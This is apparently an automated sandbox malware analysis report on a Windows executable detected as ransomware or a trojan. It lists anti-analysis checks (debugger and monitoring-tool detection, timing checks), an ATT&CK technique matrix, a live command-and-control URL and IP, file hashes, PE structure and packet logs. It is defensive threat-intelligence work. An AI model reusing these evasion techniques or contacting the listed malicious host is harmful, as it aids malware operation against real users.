Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | File opened: NTICE
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | File opened: SICE
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Code function: 0_2_01179980 rdtsc 0_2_01179980
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 5.101.3.217:80

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
f7qbEfJl0B.exe | 39% | ReversingLabs | Win32.Ransomware.Generic
f7qbEfJl0B.exe | 100% | Avira | TR/Crypt.TPM.Gen
f7qbEfJl0B.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQ | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQ~ | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQ | f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | f7qbEfJl0B.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | f7qbEfJl0B.exe, 00000000.00000002.2172952081.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | f7qbEfJl0B.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQ~ | f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html# | f7qbEfJl0B.exe | false | | high
https://curl.se/docs/alt-svc.html | f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581409
Start date and time: 2024-12-27 15:11:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: f7qbEfJl0B.exe (renamed because original name is a hash value)
Original Sample Name: 01fbecb34b5ac1c9c3336c64817f1637.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: f7qbEfJl0B.exe

Time | Type | Description
09:12:48 | API Interceptor | 72x Sleep call for process: f7qbEfJl0B.exe modified
                                                      • 34.226.108.155
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                      • 34.226.108.155
                                                      db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                      • 34.195.210.183
                                                      No context
                                                      No context
                                                      No created / dropped files found
                                                      File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit): 7.9850088221064475
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name: f7qbEfJl0B.exe
                                                      File size: 4'487'168 bytes
                                                      MD5: 01fbecb34b5ac1c9c3336c64817f1637
                                                      SHA1: 51f08b5cfb4d7c7c0bb96b8c0c171e3cf05e27ab
                                                      SHA256: 828c90e4bd13605fdf955b30e36336ff08d5f10858f21fdf38529debdd216013
                                                      SHA512: 117787a4cad5f04af82f0492dd6118bc4f2af2e1cb209d92aa8edf437ce11d6f27bda74d816fe7640f47b6bbeb3cefb98ff9707106edec227274d4ba3d33f2fb
                                                      SSDEEP: 98304:u/jc2pRsx2Zwa0WBsFu7RPv6PPWucMdwQ05:uLcSOcZwaxiMRP8PWrMa75
                                                      TLSH: A4263328ABBADCA0D28B2EFAAED11D1552AD52074951820B0BBDB5F31DC7ED4CD5D00F
                                                      File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...0....... I...@..........................`........D...@... ............................
                                                      Icon Hash: 90cececece8e8eb0
                                                      Entrypoint: 0x1033000
                                                      Entrypoint Section: .taggant
                                                      Digitally signed: true
                                                      Imagebase: 0x400000
                                                      Subsystem: windows gui
                                                      Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics: DYNAMIC_BASE
                                                      Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major: 4
                                                      OS Version Minor: 0
                                                      File Version Major: 4
                                                      File Version Minor: 0
                                                      Subsystem Version Major: 4
                                                      Subsystem Version Minor: 0
                                                      Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                      Signature Valid:
                                                      Signature Issuer:
                                                      Signature Validation Error:
                                                      Error Number:
                                                      Not Before, Not After
                                                        Subject Chain
                                                          Version:
                                                          Thumbprint MD5:
                                                          Thumbprint SHA-1:
                                                          Thumbprint SHA-256:
                                                          Serial:
                                                          | Name | Virtual Address | Virtual Size | Is in Section |
                                                          |---|---|---|---|
                                                          | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata |
                                                          | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc |
                                                          | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 | |
                                                          | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc30f78 | 0x10 | lrpylste |
                                                          | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_TLS | 0xc30f28 | 0x18 | lrpylste |
                                                          | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                                          | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                          | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                                          |---|---|---|---|---|---|---|---|---|---|
                                                          | | 0x1000 | 0x6db000 | 0x288a00 | 69e762bafc9fbe7ecb577ac5071266b5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                                          | .rsrc | 0x6dc000 | 0x1ac | 0x200 | 1fdb95bb60dc727bff8444ebeb5ff63a | False | 0.580078125 | data | 4.555669507961507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                                          | .idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                                          | | 0x6de000 | 0x398000 | 0x200 | 00fe6af17e892930437991d90e82b266 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                                          | lrpylste | 0xa76000 | 0x1bc000 | 0x1bb200 | c6211f864fa5d1d34e4fc8f5b79f5fca | False | 0.9943323563117066 | data | 7.95488352075432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                                          | fpogxiqp | 0xc32000 | 0x1000 | 0x400 | 38323e91c19ffcd0d5e2782f33eebe3a | False | 0.72265625 | data | 5.683286921786855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                                          | .taggant | 0xc33000 | 0x3000 | 0x2200 | 0018d613104774110fae6725ee68e39b | False | 0.050551470588235295 | DOS executable (COM) | 0.5029686698151392 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

                                                          | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                                                          |---|---|---|---|---|---|---|
                                                          | RT_MANIFEST | 0xc30f88 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

                                                          | DLL | Import |
                                                          |---|---|
                                                          | kernel32.dll | lstrcpy |
                                                          Dec 27, 2024 15:12:27.296210051 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296262980 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.296509027 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296669960 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296783924 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.296937943 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297049999 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297075033 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297225952 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297321081 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297409058 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297590971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297770977 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297776937 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297889948 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297894955 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.297996044 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298042059 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298046112 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298223019 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298228025 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298286915 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298341990 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298434973 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298496008 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298511028 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298546076 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298573017 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298700094 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298705101 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298785925 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298823118 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298830032 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298887014 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298932076 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299020052 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.299021006 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299129009 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299134016 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299237013 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299242020 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299370050 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299374104 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299411058 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299463987 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299509048 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299513102 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299614906 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299660921 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299762964 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299767971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299885035 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299890041 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299987078 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299992085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300162077 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300165892 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300251961 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300256014 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300364017 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300369024 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300414085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300417900 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300489902 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300523996 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300626993 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300631046 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300724983 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300729990 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300858974 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300863028 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415823936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415832996 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415890932 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415930986 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416066885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416121006 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416172981 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416596889 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.416687965 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.418042898 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418046951 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418175936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418215036 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418301105 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418402910 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418407917 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418416977 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418576956 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418581009 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418667078 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418672085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418725014 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418791056 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418889999 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418934107 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419008970 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419084072 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419260979 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419265985 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419400930 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419449091 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419529915 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419533968 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419609070 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419612885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419629097 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419634104 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419715881 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419720888 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419884920 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419898033 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420098066 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420103073 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420303106 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420425892 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420504093 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420516968 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420602083 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420607090 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420686007 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420730114 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420810938 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420814991 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420942068 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420947075 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421094894 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421098948 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421242952 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421247005 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421314955 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421355009 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421359062 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421367884 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421577930 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.536371946 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536384106 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536408901 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536415100 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536465883 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536472082 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536561012 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536566973 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536643982 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536649942 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536782980 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536788940 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536844015 CET80497315.101.3.217192.168.2.4
